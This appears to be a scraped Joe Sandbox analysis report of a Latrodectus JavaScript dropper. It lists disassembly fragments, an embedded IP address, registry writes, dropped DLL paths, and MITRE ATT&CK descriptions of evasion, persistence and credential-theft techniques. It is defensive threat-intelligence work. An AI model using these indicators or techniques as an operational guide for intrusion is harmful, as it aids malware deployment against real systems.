Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterinstall
API String ID: 3702945584-3718352646
Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000000180074CD8
Sleep.KERNEL32(?,171.8.167.45,?,0000000180074FBF,?,?,?,?,?,?,000000018006F6BE), ref: 0000000180074CF4

Strings

171.8.167.45, xrefs: 0000000180074CCB

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: 171.8.167.45
API String ID: 1164918020-2723241389
Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B060 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SHSetValueW.SHLWAPI ref: 000000018005B0BD

Strings

opentime_afterinstall, xrefs: 000000018005B0AA
MsgCenter, xrefs: 000000018005B07E

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterinstall
API String ID: 3702945584-3718352646
Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008455E Relevance: 5.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 000000018008457B
_CxxThrowException.MSVCRT ref: 000000018008459B
_CxxThrowException.MSVCRT ref: 00000001800845BE
_CxxThrowException.MSVCRT ref: 00000001800845E1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Document_a51_19i793302-14b09981a5569-3684u8.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

:wtfbbq (copy)

C:\Config.Msi\4e00e0.rbs

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

C:\Users\user\AppData\Local\sharepoint\360total.dll

C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll

C:\Windows\Installer\MSI103.tmp

C:\Windows\Installer\MSI181.tmp

Windows Analysis Report
Document_a51_19i793302-14b09981a5569-3684u8.js

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre